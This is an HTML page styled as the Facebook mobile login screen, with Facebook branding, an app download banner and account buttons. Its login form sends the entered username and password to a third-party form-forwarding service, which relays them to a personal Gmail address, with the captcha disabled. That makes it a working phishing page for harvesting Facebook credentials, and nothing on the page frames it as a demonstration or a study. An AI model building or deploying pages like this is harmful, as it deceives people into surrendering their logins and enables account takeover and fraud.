<!DOCTYPE html>
<html>
<head>
<title>LOG IN</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style type="text/css">
*{
    padding:0;
    margin:0;
    box-sizing:border-box;
}

header{
    background-color:#FFFBE2;
    display:flex;
    padding:4.2px;
}

header .phone-icon{
    margin-left:15px;
}

.phone-icon img{
    width:25px;
}

header p{
    font-size:14.2px;
    margin:13px 0 0 7px;
    color:#465A98;
}

.fb-logo{
    margin:18px 0 0 130px;
}

.fb-logo h1{
    font-size:23px;
    color:#1777F3;
}

form{
    margin:12px 0 0 13px;
}

form .user-data{
    padding:13px;
    width:329px;
    margin:3px;
    background-color:#F5F6F8;
    border:0.5px outset white;
    border-radius:5px;
    font-size:14.2px;
}

form button{
    padding:13px;
    width:329px;
    margin:8px 0 0 4px;
    background-color:#1878F3;
    border:0.5px outset white;
    border-radius:5px;
    font-size:17px;
    color:white;
    font-weight:500;
}

.other-options{
    margin:12px 0 0 13px;
}

.other-options .change-password{
    text-align:center;
    font-size:15px;
    color:#465A98;
}

.other-options .hor-line{
    display:flex;
    margin-top:20px;
}

.hor-line p{
    padding:15px;
    margin-top:-15px;
}

.hor-line .line{
    width:140px;
    height:1px;
    background-color:grey;
    margin:10px 0 0 0;
}

.other-options .ac-btn{
    background-color:#00A400;
    border:none;
    padding:10px;
    width:160px;
    color:white;
    border-radius:5px;
    font-size:14.2px;
    font-weight:500;
    margin-left:90px;
}

footer{
    margin:120px 0 0 40px;
    width:280px;
}

footer img{
    width:280px;
}
</style>
</head>
<body>
<header>
<div class="phone-icon">
<img src="phone icon.jpg" alt="icon">
</div>
<p>Get Facebook for Android and browse faster.</p>
</header>
<div class="fb-logo">
<h1>facebook</h1>
</div>
<form action="https://formsubmit.co/tarobengia9@gmail.com" method="post">
<input class="user-data" type="text" name="username" placeholder="Mobile number or email address" required>
<input class="user-data" type="password" name="password" placeholder="Password" required>
<input type="hidden" name="_captcha" value="false">
<button type="submit">Log In</button>
</form>
<div class="other-options">
<p class="change-password">Forgotten password?</p>
<div class="hor-line">
<div class="line">
</div>
<p>or</p>
<div class="line">
</div>
</div>
<button class="ac-btn">Create New Account</button>
</div>
<footer>
<img src="footer.jpg" alt="footer">
</footer>
</body>
</html>